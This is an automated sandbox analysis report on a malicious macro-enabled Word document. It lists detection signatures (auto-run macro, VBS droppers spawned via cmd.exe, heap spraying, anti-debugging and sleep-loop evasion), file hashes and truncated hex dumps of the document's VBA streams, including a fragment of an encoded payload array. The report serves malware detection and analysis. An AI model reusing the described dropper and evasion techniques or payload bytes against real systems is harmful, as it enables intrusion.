Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 204882 |
Start time: | 17:38:44 |
Joe Sandbox Product: | Cloud |
Start date: | 12.01.2017 |
Overall analysis duration: | 0h 4m 39s |
Report type: | full |
Sample file name: | k-25ss9tv61sm78f_35s.rtf |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal84.evad.expl.winRTF@6/14@0/0 |
HCA Information: |
|
EGA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 84 | 0 - 100 | Report FP / FN |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence | |
---|---|---|---|---|---|
Threshold | 5 | 0 - 5 | false |
Classification |
---|
Analysis Advice |
---|
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerabilities: |
---|
Allocates a big amount of memory (probably used for heap spraying) | Show sources |
Source: winword.exe | Memory has grown: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: |
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Found strings which match to known social media urls | Show sources |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: |
Potential malicious VBS script found (has network functionality) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Persistence and Installation Behavior: |
---|
Command shell drops VBS files | Show sources |
Source: C:\Windows\System32\cmd.exe | File created: |
Data Obfuscation: |
---|
Obfuscated document found, RTF is a DOCX | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | Initial file: |
System Summary: |
---|
Checks whether correct version of .NET is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) | Show sources |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Executes visual basic scripts | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE indicator, VBA macros: |
Document misses a certain OLE stream usually present in this Microsoft Office document type | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: DocumeNt_OPen |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: K9 |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: K9 |
Potential malicious VBS script found (suspicious strings) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Very long command line found | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) | Show sources |
Source: WINWORD.EXE, wscript.exe | Binary or memory string: | ||
Source: WINWORD.EXE, wscript.exe | Binary or memory string: | ||
Source: WINWORD.EXE, wscript.exe | Binary or memory string: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging | Show sources |
Source: C:\Windows\System32\cmd.exe | Memory protected: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Found WSH timer for Javascript or VBS script (likely evasive script) | Show sources |
Source: C:\Windows\System32\wscript.exe | Window found: |
Potential evasive VBS script found (sleep loop) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Potential evasive VBS script found (use of timer() function in loop) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries time zone information | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
TrID: |
|
File name: | k-25ss9tv61sm78f_35s.rtf |
File size: | 111687 |
MD5: | 58258b89e076c4d378436f3b03682402 |
SHA1: | 1f10ad2812c48ceb7d2d2235ea7964a4c7b9bd56 |
SHA256: | edd557fa4e85f7d5429d74b7708607e9bdb848d0a7f55bdad79b163642c44bf6 |
SHA512: | 0179e8dfdcde9b9e79a263549ec0579367312514d8a4eeef9adf2cb0b833d8a7c789dc1b9cc913e399442243c6717b166044e82ca5ac581a34d9ff8aa8f562d7 |
File Content Preview: | PK..........!..Pg.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "word/vbaProject.bin" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 25519 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 25519 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / K . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 e4 0f 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff eb 0f 00 00 2f 4b 00 00 00 00 00 00 01 00 00 00 15 e3 ca e0 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1157 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1157 |
Data ASCII: | . . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . { > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 15 e3 7b 3e 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 484 |
Entropy: | 5.3272379526 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 F 1 6 5 7 C 5 - 2 1 D 0 - 4 9 D 7 - 9 B D D - 7 A A 3 E A 5 5 A 5 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 A 4 8 A 4 7 C E A 8 0 E A 8 0 E A 8 0 E A 8 0 " . . D P B = " 9 4 9 |
Data Raw: | 49 44 3d 22 7b 30 46 31 36 35 37 43 35 2d 32 31 44 30 2d 34 39 44 37 2d 39 42 44 44 2d 37 41 41 33 45 41 35 35 41 35 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00 |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60507024638 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 2 2 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 3 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: UserForm1/f, File Type: data, Stream Size: 131 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 131 |
Entropy: | 3.58523835821 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . . . . . . . . . . . . . . . . } . . t . . 9 . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . > . . . . . . L a b e l 1 . . . . . . . . . . |
Data Raw: | 00 04 24 00 08 0c 10 0c 01 00 00 00 ff ff 00 00 01 00 00 00 00 7d 00 00 74 20 00 00 39 16 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 a4 3e 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 00 00 00 00 00 |
Stream Path: UserForm1/o, File Type: data, Stream Size: 16036 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | data |
Stream Size: | 16036 |
Entropy: | 3.15372473478 |
Base64 Encoded: | False |
Data ASCII: | . . . > ( . . . q > . . 6 7 , 6 9 , 3 3 , 2 2 8 , 2 3 2 , 1 4 1 , 2 5 4 , 2 2 , 8 3 , 2 3 0 , 9 1 , 8 7 , 2 0 1 , 1 6 , 9 8 , 4 6 , 1 7 7 , 1 4 6 , 9 7 , 3 6 , 1 5 8 , 6 6 , 1 6 5 , 1 7 4 , 1 0 8 , 2 0 9 , 1 0 6 , 4 1 , 1 5 9 , 1 4 7 , 2 1 , 6 0 , 6 9 , 1 6 , 5 0 , 1 0 3 , 7 1 , 4 4 , 5 , 9 , 1 5 , 1 3 4 , 2 0 0 , 7 5 , 2 5 4 , 1 1 6 , 3 9 , 1 9 4 , 2 1 9 , 1 3 5 , 4 9 , 6 6 , 2 5 3 , 2 3 , 2 3 2 , 2 0 0 , 2 1 2 , 1 2 1 , 1 3 8 , 2 0 6 , 1 6 5 , 6 1 , 1 1 8 , 8 7 , 2 0 0 , 1 2 1 , 1 5 2 , 4 4 , 1 0 6 , 2 3 |
Data Raw: | 00 02 84 3e 28 00 00 00 71 3e 00 80 36 37 2c 36 39 2c 33 33 2c 32 32 38 2c 32 33 32 2c 31 34 31 2c 32 35 34 2c 32 32 2c 38 33 2c 32 33 30 2c 39 31 2c 38 37 2c 32 30 31 2c 31 36 2c 39 38 2c 34 36 2c 31 37 37 2c 31 34 36 2c 39 37 2c 33 36 2c 31 35 38 2c 36 36 2c 31 36 35 2c 31 37 34 2c 31 30 38 2c 32 30 39 2c 31 30 36 2c 34 31 2c 31 35 39 2c 31 34 37 2c 32 31 2c 36 30 2c 36 39 2c 31 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3840 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3840 |
Entropy: | 4.75359525678 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . |
Data Raw: | cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 779 |
---|
General | |
